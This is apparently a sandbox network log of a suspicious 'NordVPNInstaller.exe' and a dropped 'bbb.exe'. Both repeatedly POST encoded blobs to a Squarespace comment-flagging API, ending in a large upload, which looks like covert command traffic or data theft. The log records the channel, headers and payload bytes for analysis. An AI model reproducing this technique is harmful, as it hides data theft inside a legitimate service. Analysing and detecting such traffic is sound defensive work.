6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjeUkUZfPaUW1TfrC8QXJL5ZIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:30 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:29 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bf2ZHmvPXO6JYTk3MTNiNDMwYWE3YjAyNzcyOGRmYjAwZTQ4YWUx; Path=/; Secure Set-Cookie: crumb=BTEWi0s58gAxNmM1OTMzMDQ5YWJkNDBmOTJjYmQzMDdlMTQyNGU2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 2tWlVyCh/lHAKK1gW Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTEWi0s58gAxNmM1OTMzMDQ5YWJkNDBmOTJjYmQzMDdlMTQyNGU2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49795	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:30 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:30 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:30 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:30 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:30 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQ1bmuAFhRKsMGY5ODM4ZGNkMTdhYzBmZDFjYWFmMzU4OGNkMTRh; Path=/; Secure Set-Cookie: crumb=BQVrFdGIdMspMTU2MzgyZmE3MTQyY2VlNzYyZGIzNWE1OGQ0N2My; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 11OL2JiR/QkZ0ndff Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQVrFdGIdMspMTU2MzgyZmE3MTQyY2VlNzYyZGIzNWE1OGQ0N2My"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49796	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:30 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:30 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:30 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:30 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:30 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bfege3f-MDfFOTQxZjhiYmU5MjRiZTc4MjQxMGUyYTkwY2Y2YzM5; Path=/; Secure Set-Cookie: crumb=BYwS2GVM6N47MjE1ODZjOWEwNGQ2ODY4NWUyNTU3MDU2M2M3NjBk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: XFu0cTha/3fbwUGpG Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYwS2GVM6N47MjE1ODZjOWEwNGQ2ODY4NWUyNTU3MDU2M2M3NjBk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49797	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:30 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:30 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:30 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 6d 4c 73 4e 36 63 54 53 75 38 47 6c 71 6a 5a 4c 75 5a 35 56 6c 70 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjmLsN6cTSu8GlqjZLuZ5VlpIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:30 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:30 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BWHHnkQxDMIRYTRiNjI2ODU2MTQyYjFlNzA3NzUzM2ZkNjdlZjI0; Path=/; Secure Set-Cookie: crumb=BUPVV5ilVN_TODQ3YzMyMjVkNWRhNGE2MjQ2MzVmOGVhZDAyYmRi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: RpHnY9sQ/D84shGkS Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUPVV5ilVN_TODQ3YzMyMjVkNWRhNGE2MjQ2MzVmOGVhZDAyYmRi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49799	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:31 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:31 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:31 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:31 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:31 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRtVkrLz04PhZDVkZjM5NzgyOGY4OTlhYTEzZDgzYTE1YTJkYWRi; Path=/; Secure Set-Cookie: crumb=BXfritq-hAHmZDcwNGZiYTFiNWVmNTAwNjkxNGI4MGY2MTkwNTUz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 21zg3I73/8TmnQJra Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXfritq-hAHmZDcwNGZiYTFiNWVmNTAwNjkxNGI4MGY2MTkwNTUz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49798	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:31 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:31 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:31 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:31 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:31 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Beg6SyjIexEtN2U4ZmVhNjNlY2E3ZWM3MzQ4NWU1NGUwYTRmM2M1; Path=/; Secure Set-Cookie: crumb=BWX6g_d7t6lJNDg5M2RiMjUyNzA2YzJmOTM5NTIzOTFlOTJjYjUx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: w7i1C7ru/rBKRA6qy Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BWX6g_d7t6lJNDg5M2RiMjUyNzA2YzJmOTM5NTIzOTFlOTJjYjUx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49800	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:31 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:32 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:32 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:32 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BagEZxWIfgyyNWMzZDdlMWRhMjk2ZTE0YzUyYTMxYTBiY2ViYjhj; Path=/; Secure Set-Cookie: crumb=BeCmL6coagQJY2Q2OWQ2ZjJlMGNiNDM5NTExNDhhOTg3ZjBjMzQy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Q9tWHd6i/1fzwgwTc Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeCmL6coagQJY2Q2OWQ2ZjJlMGNiNDM5NTExNDhhOTg3ZjBjMzQy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49801	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:32 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108352 Expect: 100-continue
2024-09-01 19:56:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:32 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 7a 62 68 58 43 72 66 25 32 42 50 6e 4c 6e 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YzbhXCrf%2BPnLnbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQw
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 76 Data Ascii: v
2024-09-01 19:56:32 UTC	16306	OUT	Data Raw: 49 48 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f Data Ascii: IHJ8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTco
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 61 Data Ascii: a
2024-09-01 19:56:32 UTC	16306	OUT	Data Raw: 35 6c 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c Data Ascii: 5labaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9cl
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 53 Data Ascii: S
2024-09-01 19:56:32 UTC	16306	OUT	Data Raw: 44 39 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 Data Ascii: D9PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwg
2024-09-01 19:56:32 UTC	1	OUT	Data Raw: 72 Data Ascii: r
